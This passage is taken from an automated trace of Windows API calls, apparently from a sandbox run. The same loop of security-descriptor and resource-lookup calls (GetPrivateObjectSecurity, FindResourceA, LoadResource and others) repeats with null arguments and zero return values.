ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.148] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.148] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.148] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.148] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.148] LockResource (hResData=0x0) returned 0x0 [0220.148] FreeResource (hResData=0x0) returned 0 [0220.148] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.148] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.148] LockResource (hResData=0x0) returned 0x0 [0220.148] FreeResource (hResData=0x0) returned 0 [0220.148] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.148] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.148] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.148] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.148] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.148] LockResource (hResData=0x0) returned 0x0 [0220.148] FreeResource (hResData=0x0) returned 0 [0220.148] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.148] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.148] LockResource (hResData=0x0) returned 0x0 [0220.148] FreeResource (hResData=0x0) returned 0 [0220.148] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.149] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.149] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.149] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.149] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.149] LockResource (hResData=0x0) returned 0x0 [0220.149] FreeResource (hResData=0x0) returned 0 [0220.149] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.149] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.149] LockResource (hResData=0x0) returned 0x0 [0220.149] FreeResource (hResData=0x0) returned 0 [0220.149] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.149] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.149] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.149] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.149] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.149] LockResource (hResData=0x0) returned 0x0 [0220.149] FreeResource (hResData=0x0) returned 0 [0220.149] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.149] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.149] LockResource (hResData=0x0) returned 0x0 [0220.149] FreeResource (hResData=0x0) returned 0 [0220.149] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.149] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.149] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.149] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.149] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.149] LockResource (hResData=0x0) returned 0x0 [0220.149] FreeResource (hResData=0x0) returned 0 [0220.149] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.149] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.149] LockResource (hResData=0x0) returned 0x0 [0220.149] FreeResource (hResData=0x0) returned 0 [0220.149] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.149] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.149] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.149] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.149] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.149] LockResource (hResData=0x0) returned 0x0 [0220.149] FreeResource (hResData=0x0) returned 0 [0220.149] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.149] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.149] LockResource (hResData=0x0) returned 0x0 [0220.149] FreeResource (hResData=0x0) returned 0 [0220.149] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.150] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.150] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.150] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.150] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.150] LockResource (hResData=0x0) returned 0x0 [0220.150] FreeResource (hResData=0x0) returned 0 [0220.150] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.150] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.150] LockResource (hResData=0x0) returned 0x0 [0220.150] FreeResource (hResData=0x0) returned 0 [0220.150] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.150] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.150] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.150] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.150] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.150] LockResource (hResData=0x0) returned 0x0 [0220.150] FreeResource (hResData=0x0) returned 0 [0220.150] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.150] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.150] LockResource (hResData=0x0) returned 0x0 [0220.150] FreeResource (hResData=0x0) returned 0 [0220.150] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.150] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.150] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.150] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.150] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.150] LockResource (hResData=0x0) returned 0x0 [0220.150] FreeResource (hResData=0x0) returned 0 [0220.150] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.150] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.150] LockResource (hResData=0x0) returned 0x0 [0220.150] FreeResource (hResData=0x0) returned 0 [0220.150] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.150] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.150] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.150] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.150] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.150] LockResource (hResData=0x0) returned 0x0 [0220.150] FreeResource (hResData=0x0) returned 0 [0220.150] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.150] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.150] LockResource (hResData=0x0) returned 0x0 [0220.150] FreeResource (hResData=0x0) returned 0 [0220.150] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.150] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.150] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.150] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.150] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.150] LockResource (hResData=0x0) returned 0x0 [0220.151] FreeResource (hResData=0x0) returned 0 [0220.151] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.151] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.151] LockResource (hResData=0x0) returned 0x0 [0220.151] FreeResource (hResData=0x0) returned 0 [0220.151] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.151] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.151] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.151] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.151] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.151] LockResource (hResData=0x0) returned 0x0 [0220.151] FreeResource (hResData=0x0) returned 0 [0220.151] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.151] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.151] LockResource (hResData=0x0) returned 0x0 [0220.151] FreeResource (hResData=0x0) returned 0 [0220.151] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.151] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.151] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.151] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.151] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.151] LockResource (hResData=0x0) returned 0x0 [0220.151] FreeResource (hResData=0x0) returned 0 [0220.151] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.151] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.151] LockResource (hResData=0x0) returned 0x0 [0220.151] FreeResource (hResData=0x0) returned 0 [0220.151] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.151] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.151] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.151] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.151] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.151] LockResource (hResData=0x0) returned 0x0 [0220.151] FreeResource (hResData=0x0) returned 0 [0220.151] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.151] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.151] LockResource (hResData=0x0) returned 0x0 [0220.151] FreeResource (hResData=0x0) returned 0 [0220.151] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.151] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.151] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.151] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.151] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.151] LockResource (hResData=0x0) returned 0x0 [0220.151] FreeResource (hResData=0x0) returned 0 [0220.151] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.151] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.151] LockResource (hResData=0x0) returned 0x0 [0220.151] FreeResource (hResData=0x0) returned 0 [0220.151] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.152] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.152] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.152] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.152] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.152] LockResource (hResData=0x0) returned 0x0 [0220.152] FreeResource (hResData=0x0) returned 0 [0220.152] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.152] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.152] LockResource (hResData=0x0) returned 0x0 [0220.152] FreeResource (hResData=0x0) returned 0 [0220.152] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.152] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.152] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.152] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.152] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.152] LockResource (hResData=0x0) returned 0x0 [0220.152] FreeResource (hResData=0x0) returned 0 [0220.152] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.152] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.152] LockResource (hResData=0x0) returned 0x0 [0220.152] FreeResource (hResData=0x0) returned 0 [0220.152] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.152] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.152] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.152] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.152] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.152] LockResource (hResData=0x0) returned 0x0 [0220.152] FreeResource (hResData=0x0) returned 0 [0220.152] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.152] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.152] LockResource (hResData=0x0) returned 0x0 [0220.152] FreeResource (hResData=0x0) returned 0 [0220.152] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.152] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.152] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.152] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.152] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.152] LockResource (hResData=0x0) returned 0x0 [0220.152] FreeResource (hResData=0x0) returned 0 [0220.152] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.152] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.152] LockResource (hResData=0x0) returned 0x0 [0220.152] FreeResource (hResData=0x0) returned 0 [0220.152] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.152] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.152] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.152] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.152] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.152] LockResource (hResData=0x0) returned 0x0 [0220.152] FreeResource (hResData=0x0) returned 0 [0220.153] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.153] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.153] LockResource (hResData=0x0) returned 0x0 [0220.153] FreeResource (hResData=0x0) returned 0 [0220.153] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.153] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.153] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.153] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.153] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.153] LockResource (hResData=0x0) returned 0x0 [0220.153] FreeResource (hResData=0x0) returned 0 [0220.153] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.153] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.153] LockResource (hResData=0x0) returned 0x0 [0220.153] FreeResource (hResData=0x0) returned 0 [0220.153] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.153] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.153] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.153] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.153] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.153] LockResource (hResData=0x0) returned 0x0 [0220.153] FreeResource (hResData=0x0) returned 0 [0220.153] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.153] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.153] LockResource (hResData=0x0) returned 0x0 [0220.153] FreeResource (hResData=0x0) returned 0 [0220.153] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.153] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.153] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.153] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.153] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.153] LockResource (hResData=0x0) returned 0x0 [0220.153] FreeResource (hResData=0x0) returned 0 [0220.153] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.153] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.153] LockResource (hResData=0x0) returned 0x0 [0220.153] FreeResource (hResData=0x0) returned 0 [0220.153] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.153] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.153] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.153] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.153] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.153] LockResource (hResData=0x0) returned 0x0 [0220.153] FreeResource (hResData=0x0) returned 0 [0220.153] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.153] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.153] LockResource (hResData=0x0) returned 0x0 [0220.153] FreeResource (hResData=0x0) returned 0 [0220.154] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.154] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.154] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.154] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.154] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.154] LockResource (hResData=0x0) returned 0x0 [0220.154] FreeResource (hResData=0x0) returned 0 [0220.154] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.154] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.154] LockResource (hResData=0x0) returned 0x0 [0220.154] FreeResource (hResData=0x0) returned 0 [0220.154] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.154] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.154] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.154] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.154] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.154] LockResource (hResData=0x0) returned 0x0 [0220.154] FreeResource (hResData=0x0) returned 0 [0220.154] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.154] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.154] LockResource (hResData=0x0) returned 0x0 [0220.154] FreeResource (hResData=0x0) returned 0 [0220.154] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.154] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, 